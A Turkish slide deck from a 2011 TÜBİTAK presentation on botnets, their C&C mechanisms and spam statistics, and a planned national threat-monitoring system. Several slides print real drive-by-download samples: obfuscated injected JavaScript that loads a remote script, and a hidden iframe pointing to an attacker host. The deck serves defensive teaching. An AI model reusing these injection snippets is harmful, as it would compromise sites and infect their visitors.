Botnetler ve Tehdit Gözetleme Sistemi

Botnetler

Ve

Tehdit Gözetleme Sistemi

Necati Ersen ŞİŞECİ

Bilişim Sistemleri Güvenliği Gurubu

TÜBİTAK BİLGEM UEKAE

siseci@uekae.tubitak.gov.tr

16/05/2011

Botnet Nedir?

• Nasıl Çalışır?

• Nasıl Bulaşır?

• Ne Amaçla Kullanılır?

• Nasıl Yönetilir?

• Nasıl Tespit Edilir?

Nasıl Bulaşır?

Örnek Bulaşma Senaryosu

(Drive-by Download)

The Torpig network infrastructure

Ne Amaçla Kullanılır?

Ne Amaçla Kullanılır?

• Spam

• Phishing

• Gizli bilgilerin çalınması

• DDoS Atakları

• Malware yükleme ve dağıtımı

• Tıklama Sahtekarlığı

C&C Mekanizması

• HTTP

• Zeus

• P2P

• Storm

• IRC

• AgoBot, SdBot

• Diğer protokoller

• Svelta

C&C Mekanizması

Botnet C&C Mekanizması ile kullanılan yöntemler (2Q10)

Merkezi C&C

Dağıtık C&C

C&C Mekanizması

Botnet C&C Mekanizması ile kullanılan yöntemler (2Q10)

C&C Mekanizması

• Svelta

Zeus Configuration Tool

İstatistikler

2010’un 1 ve 2nci

çeyreğinde en çok

Microsoft Software

Removal Tool

Tarafından

temizlenen botlar

Spambot İstatistikleri

Lethic: 12.000 – 60.000 msgs/hour/bot

Grum: Mar 2010, 39.9 Billion Spam/day

Cutwail: 74 Billion Spam/day

Mart 2011

Mayıs 2011

14

Gündem

• Tehdit Gözetleme Sistemi nedir?

• Karşı önlemler

• Alt yapı gereksinimleri

• Yapılan Çalışmalar

Tehdit Gözetleme Sistemi Servisleri

• Ulusal Merkezi Saldırı ve Anormallik

Tespiti

• Botnet Tespiti, Engelleme, Ele Geçirme ve

Karşı Önlemler

• Aktif Güvenlik Sağlama

• Balküpleri İle Güvenlik Önlemleri

• Raporlama ve İstatistik Çıkarma

• İnternet Güvenliği Bilgi Deposu Oluşturma

Tehdit Gözetleme Sistemi Servisleri

Sensor

Veritabanı

Web Sunucu

ISP’ler Sensor

Kayıt Sunucuları

TGS MERKEZİ

Verimadeni Sunucuları

Alarmlar

Gerekli Sistem Yetenekleri

Veri kaynakları

Ağ trafik bilgisi

Sistem aktivitleri

Balküpleri

Veri senkranizasyon

Filtreleme

Veritabanı

Sunucuları

Analiz Prosesleri

Analiz Uzmanları

Çıktılar, Raporlar,

Alarmlar

TGS Gündeminden Örnekler

• Nisan 22, 2009. Finjan ekibi 1.9 milyon

birimi yöneten bir botnet tespit etti.

– Merkez sunucular Ukraynada

– Gelişmiş bir kullanım arayüzünden sistemler

yönetilebilmekte, birimler üzerinde komutlar

çalıştırılmakta, kurulum ve web aktiviteleri

gerçekleşebilmektedir.

– Enfekte makinalar forumlarda ticari olarak

sunulmakta, takasları yapılmakta

Kaynak: http://www.securityfocus.com

TGS Gündeminden Örnekler

• Kasım, 2009. FireEye ekibi dünyanın

spam trafiğinin %4.2 sini üreten Ozdok

botnet’ini tespit etti. Sunucuların tespit

edilmesinin ardından Spam trafiği kesildi.

– Merkez sunucular çoğunlukla Amerikada.

ABD dışında sadece Türkiye ve Israil de

sunucuları var.

Kaynak: http://www.fireeye.com

TGS Gündeminden Örnekler

• Eylül, 2009 Hollanda IPS’leri Anti-Botnet

Anlaşması İmzaladılar.

– 14 ISP(%98 pazar payı)

– Hedef; Botnet ve malware tespiti ve

engellemesi

– Temel Maddeler:

• Anlaşmalı ISP’ler arasında ilgili bilgi paylaşımı

• Enfekte olmuş uçların karantinaya alınması

• Son kullanıcıların ISP’ler tarafından haberdar

edilmesi

Kaynak: http://www.i-policy.org

Türkiye ve Botnet’ler

• Turkiye, 2008 verilerine göre Dünya’da* “Botnet”lere ev sahipliği yapan ülkeler sıralamasında 8. – Spam e-posta üretiminde 5. (2008’in son beş ayında 2.)

– 2007’de 15. sıradan 2008’de 9. sıraya çıkarak kötü niyetli faaliyetlerin toplamının %3’unun kaynağı durumundadır. (En hızlı yükselen ülke)

– Yükselen diğer iki ulke, Brezilya ve Polonya’dır.

• İnternet’te yer alan kiralık Botnet ilanlarında Turkiye 40 USD / 1000 bilgisayar ile “ucuz botnet” ligindedir.

• NATO’nun siber savunmadan sorumlu biriminden Türkiye’nin DDoS faaliyetlerine karıştığına dair bilgi alınmaktadır.

• Türkiye’nin elindeki bilgisayar parkı, kendi takdiri dışında kullanılabilecek kuvvetli bir silaha dönüşebilmektedir.

(*) “Symantec Global Internet Security Threat Report. Trends for 2008. Vol. XIV”, 2009/4

Botnetlere karşı

Yeni İnternet tehditlerinin en belirgin örneği olan botnet’lere karşı etkin savunma için:

Bireysel, kurumsal ve ulusal etkin güvenlik politikalarına ihtiyaç vardır.

Yasal yaptırımlar ve eylem prosedürleri belirlenmelidir.

ISP’ler kurumlar ve otoriteler arasında etkin bir işbirliği tesis edilmelidir.

Virüs tarayıcılar, güvenlik duvarları, lokal saldırı tespiti gibi eski güvenlik önlemleri yetersiz kalmaktadır. Yeni teknolojilerle sistemin tamamının resmedilmesi, analiz edilebilmesi gereklidir.

Botnet’i Durdurmak

• Tespit

– Botnet aktivitelerinin tespit edilmesi

– Bot komuta & kontrol merkezlerinin tespit edilmesi

• Analiz

– Enfekte sistemler üzerinde analiz yapılması

– Botnet’in kopyalarının analiz edilmesi, zayıflıklarının çıkartılması

• Önlem

– Enfekte birimlerin yetkililerine bildirilmesi

– IPS’lerde ilgili ağ veya birimlerin karantinaya alınması

– Gerektiğinde aktif olarak botnet’in engellenmesi

Bizim Çalışmalarımız

• BGYS Projesi Kapsamında

– TGS alt yapısı hazırlıkları devam etmektedir.

– Halen 5 honeypot, 2 IDS, 2 Network Flow

sensörü çalışmaktadır. Toplanan veriler ileri

araştırma projelerinde de kullanılmak üzere

büyük veri depolarında saklanmaktadır.

– Kendi TGS arayüzlerimiz hazırlanmaktadır.

Muhtemel Çalışma Ortaklarımız

• ISP'ler

– ISP'ler üzerinde dinleme yapan sensörler

– Olay bildirim/müdahele süreçleri, arayüzleri

• Emniyet Kuvvetleri

– Olay bildirim/müdahele süreçleri, arayüzleri

• İletişim İdare Kurumları

– Hukuki destek

– Ulusal kapsam ve yaygınlaştırma desteği

• Araştırma Kurumları

– Akademik ağlar, sistem yetkilileri

– Akademik laboratuarlar

– Virüs, botnet uzmanları

– Verimadenciliği ve istatistik uzmanları

Örnek Drive-By-Download

'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#

@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u

#)$!(-

!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$

#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@0&)$^/!!&w

@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^

g@$(^o@(^o@g@&$l&&#e^))&@-

($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^

&(i$#@n!#^-

#@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o

@m^)&/)!c&#(n$)e()&&t)#-

^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-

#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'

Örnek Drive-By-Download

'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#

@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u

#)$!(-

!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$

#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@0&)$^/!!&w

@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^

g@$(^o@(^o@g@&$l&&#e^))&@-

($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^

&(i$#@n!#^-

#@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o

@m^)&/)!c&#(n$)e()&&t)#-

^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-

#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'

Örnek Drive-By-Download

Firefox

eklentisi

FireBug

Örnek Drive-By-Download

/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p =

document.createElement('script');H3qqea3ur6p.setAttribute('type',

'text/javascript');H3qqea3ur6p.setAttribute('id',

'myscript1');H3qqea3ur6p.setAttribute('src',

'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l

^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-

!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!

#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@0&)$^/!!&w@$(o@^r(^(!d@^p^

#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))

&@-

($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!

#^-

#@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!

c&#(n$)e()&&t)#-

^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-

#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|

#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer',

'defer');document.body.appendChild(H3qqea3ur6p);}} catch(e) {}

Örnek Drive-By-Download

Bir

forumda

aldığım

uyarı

Örnek Drive-By-Download

Rdasznp = 't(&r$$&a#^v^#i&&!^a)n(@^)-

!#c@^o(#m!.(#$u^(@#@n($i$($)v!#!i(@#s!&&i)#o&@n!#.##c$o!#!m@

.##$!r!o(@b$$t@e()&$)x!(-

@c!&o&)m$.$@)@b#l^(u@)(e&()j!$a&c#k^)(i)&(n&)&#.#r&@u$'.repla

ce(/\$|#|\(|&|\^|@|\)|\!/ig, '');

f = document.createElement('iframe');

f.style.visibility = 'hidden';

f.src = 'http://'+Rdasznp+':8080/index.php?js';

document.body.appendChild(f);

Kişisel Olarak Yapılabilecek Önlemler

32

• Lisanslı Anti-virüs Yazılımı Kullanmak

• Anti-virüs yazılımını sürekli güncel tutmak

• İşletim sistemi güncellemelerini sürekli yapmak

• Kişisel güvenlik duvarı kullanmak

• Tanıdığımız kişilerden olsa bile gelen maillerdeki

eklentileri mutlaka taratmak

• USB Belleklerdeki AutoRun virüslerine karşı Autorun’ı

devre dışı bırakmak

• Kullandığımız yazılımların (Örneğin: Adobe Acrobat,

Adobe Flash Player,Java) güncellemelerini sürekli

yapmak.

• JavaScript ataklarına karşı Firefox’u ve eklentisi

NoScript’i kullanmak.

Referanslar

• Choi, H., Lee, Hanwoo, Lee, Heejo, & Kim, H. (2007). Botnet Detection by Monitoring Group

Activities in DNS Traffic. 7th IEEE International Conference on Computer and Information

Technology (CIT 2007), 715-720. Ieee. doi: 10.1109/CIT.2007.90.

• Botnet Detection and Response, David Dagon, 2005, OARC Workshop,

• Understanding and Blocking the New Botnets, 2008, WatchGuard

• Feily, M. (2009). A Survey of Botnet and Botnet Detection. doi: 10.1109/SECURWARE.2009.48.

• Kugisaki, Y., Kasahara, Y., Hori, Y., & Sakurai, K. (2007). Bot Detection Based on Traffic

Analysis. The 2007 International Conference on Intelligent Pervasive Computing (IPC 2007), 303-

306. Ieee. doi: 10.1109/IPC.2007.91.

• Towards Next-Generation Botnets, Ralf Hund et all, 2008 European Conference.

• Richard A. Kemmerer , How to Steal a Botnet and What Can Happen When You Do, 2010

• Stone-gross, B., Cova, M., Cavallaro, L., Gilbert, B., Szydlowski, M., Kemmerer, R., et al. (n.d.).

Your Botnet is My Botnet : Analysis of a Botnet Takeover. Security.

• Taking over the Torpig botnet, http://www.cs.ucsb.edu/~seclab/projects/torpig/ , Richard A

Kemmerer

• A Controlled Environment for Botnet Traffic Generation,

http://www.cse.psu.edu/~tangpong/botnet/, April 2009

• Snort-lightweight intrusion detection for networks, Martin Roesch, Usenix 13th, 1999

• www.honeynet.org

• www.tcpdump.org

• http://www.networksorcery.com/enp/protocol/dns.htm

• http://www.securelist.com/en/analysis/204792003/The_botnet_business

• Microsoft Security Intelligence Report (www.microsoft.com/sir)

• http://www.m86security.com/labs/bot_statistics.asp

Teşekkür

• K.T.U. Bilgi İşlem Daire Başkanı

Yrd. Doç. Dr. Mustafa ULUTAŞ

• GYTE Bilgisayar Mühendisliği

Öğretim görevlisi, Doç. Dr. Hacı

Ali MANTAR

• Ulakbim Müdür Yardımcısı, Sn.

Serkan Orcan

34